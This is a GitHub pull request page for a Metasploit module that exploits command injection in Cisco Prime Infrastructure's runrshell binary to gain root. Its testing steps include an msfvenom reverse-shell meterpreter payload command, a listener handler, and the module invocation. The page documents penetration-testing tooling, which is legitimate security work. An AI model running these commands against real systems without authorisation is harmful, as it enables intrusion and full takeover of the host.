Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Privilege Escalation Module for Cisco Prime Infrastructure's runrshell Executable #11960

Merged
merged 3 commits into from Jun 19, 2019

Conversation

Projects
None yet
3 participants
@wchen-r7
Copy link
Contributor

commented Jun 10, 2019

Description

This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root. It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit. I also saw this being used again in Steven Seeley's CPI HealthMonitor exploit's writeup.

Vulnerable Setup

Cisco Prime Infrastructure 3.4.0 (or prior) is needed, and make sure have the following to set up the VM image:

  • 4 CPU cores.
  • 12288 MB of RAM (12 GB)
  • 350 GB of hard drive space

Testing

  • Log into the shell on the VM, and execute /opt/CSCOlumos/bin/getSCPcredentials.sh to generate a credential for scp
  • Generate a payload: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o /tmp/payload.bin
  • scp the payload to CPI
  • In msfconsole, start a handler: handler -p linux/x86/meterpreter/reverse_tcp -H 0.0.0.0 -P 4444, and get a shell.
  • run linux/local/cpi_runrshell_priv_esc. You should get a session, and guid should show as uid=0, gid=0, euid=0, egid=0
@jrobles-r7
Copy link
Contributor

left a comment

LGTM

@wchen-r7 wchen-r7 self-assigned this Jun 19, 2019

@wchen-r7 wchen-r7 merged commit caa9987 into rapid7:master Jun 19, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request Jun 19, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 19, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor Author

commented Jun 19, 2019

Release Notes

The Cisco Prime Infrastructure Runshell Privilege Escalation module exploits a vulnerability in the runrshell binary. The runrshell binary is intended to execute a shell script as root, but you can abuse it to inject extra commands in the argument and execute anything as root.

@tdoan-r7 tdoan-r7 added the rn-modules label Jun 26, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.